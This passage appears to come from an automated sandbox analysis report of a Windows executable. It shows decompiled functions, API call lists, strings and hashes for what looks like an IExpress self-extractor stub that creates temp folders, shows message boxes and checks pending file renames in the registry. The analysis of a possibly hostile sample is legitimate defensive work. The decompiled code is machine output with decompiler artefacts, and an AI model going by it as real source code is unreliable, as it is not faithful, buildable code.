  • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E856B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00E8571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00E85737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00E857CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00E857EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00E85802
  • Part of subcall function 00E82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00E82654
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00E85830
  • Part of subcall function 00E86517: FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                          • Part of subcall function 00E86517: LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                          • Part of subcall function 00E86517: DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                          • Part of subcall function 00E86517: FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00E85878
                                                                                                                                                                                                          • Part of subcall function 00E8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E859A8
                                                                                                                                                                                                          • Part of subcall function 00E8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00E859AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-2740620654
                                                                                                                                                                                                        • Opcode ID: 48493c958927a62cbaac4b4096942a2c2fdf3052dde0dac21f6f5da81881c411
                                                                                                                                                                                                        • Instruction ID: 182c887e837c0d1f2a5ba70ab7913ada5913230dc4f618a88983d5598ce3b11e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48493c958927a62cbaac4b4096942a2c2fdf3052dde0dac21f6f5da81881c411
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B88108B2A04A059EDB24BB719C85BFA72AD9B50304F4420B7F58EF2191EF748D858B51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        [Control-flow graph of function 00E844B9; graph image not reproduced. Legend: Executed / Not Executed.]
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xe88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xe89a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00E81680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00E8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00E8681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00E867C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00E8681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00E867C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00e84675
                                                                                                                                                                                                        0x00e845ad
                                                                                                                                                                                                        0x00e84527
                                                                                                                                                                                                        0x00e8452e
                                                                                                                                                                                                        0x00e8453f
                                                                                                                                                                                                        0x00e8453f
                                                                                                                                                                                                        0x00e84530
                                                                                                                                                                                                        0x00e84531
                                                                                                                                                                                                        0x00e84538
                                                                                                                                                                                                        0x00e8453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8453d
                                                                                                                                                                                                        0x00e84554
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e84525
                                                                                                                                                                                                        0x00e8468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E845A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E845E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00E8460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E84630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00E84666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00E8466F
                                                                                                                                                                                                          • Part of subcall function 00E8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E8686E
                                                                                                                                                                                                          • Part of subcall function 00E8681F: GetSystemMetrics.USER32(0000004A), ref: 00E868A7
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E868CC
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,?,0000000C), ref: 00E868F4
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegCloseKey.ADVAPI32(?), ref: 00E86902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: 09434d01d2fd9dae3dcc750f7f986c3c1147c6d58082fe44435644b21a9adff4
                                                                                                                                                                                                        • Instruction ID: fb891b8b0c3def79bd6567b254ec932506bac710daf3b4dfd2ff870f8524c8f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09434d01d2fd9dae3dcc750f7f986c3c1147c6d58082fe44435644b21a9adff4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251D4B19002169FDB21BF68CC48BAA7BA9EF45304F1451A5FD4DB7281DB319E09CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E853A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00E8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00E81680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00E8658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00E86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xe88a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00e8545e
                                                                                                                                                                                                        0x00e8545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E853FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-775753704
                                                                                                                                                                                                        • Opcode ID: eff86466384b3d303812bf6762bd31b55280d0a2b2fdfcf3dcf4b8ed168a21e3
                                                                                                                                                                                                        • Instruction ID: 26fadbe793e70f73c17a5bdaadd9e700cb5f1ae2b39e95f4ad13941801a64fd8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff86466384b3d303812bf6762bd31b55280d0a2b2fdfcf3dcf4b8ed168a21e3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 171104723006046BE320BB279C49FEF76ADEBC1311F041066F65EF2190CE74894A87A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 e8256d-e8257d 564 e82622-e82627 call e824e0 563->564 565 e82583-e82589 563->565 572 e82629-e8262f 564->572 567 e825e8-e82607 RegOpenKeyExA 565->567 568 e8258b 565->568 569 e82609-e82620 RegQueryInfoKeyA 567->569 570 e825e3-e825e6 567->570 568->572 573 e82591-e82595 568->573 575 e825d1-e825dd RegCloseKey 569->575 570->572 573->572 574 e8259b-e825ba RegOpenKeyExA 573->574 574->570 576 e825bc-e825cb RegQueryValueExA 574->576 575->570 576->575
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E8256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00E824E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00E84096,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?), ref: 00E825B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?,00E84096), ref: 00E825CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00E81ED3,00000001,00000000,?,?,00E84137,?,00E84096), ref: 00E825DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00E84096,00E84096,?,00E81ED3,00000001,00000000,?,?,00E84137,?), ref: 00E825FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00E84096,00000000,00000000,00000000,00000000,?,00E81ED3,00000001,00000000), ref: 00E8261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00E825C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00E825F5
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00E825A8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 0254a8578825ef85b351ba25929bff5bbcf0db34b4df128e042095c58e5742d9
                                                                                                                                                                                                        • Instruction ID: bb767da1dd4afd48b96ff169f88fbbcdfe45234a9e131cfcbfe11a7854f61235
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0254a8578825ef85b351ba25929bff5bbcf0db34b4df128e042095c58e5742d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118635942228FFEB20AB929C09DFB7FBCDF017A5F545069B90CB2010D6304E48E7A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00E87155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xe872b8);
                                                                                                                                                                                                        				E00E87208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
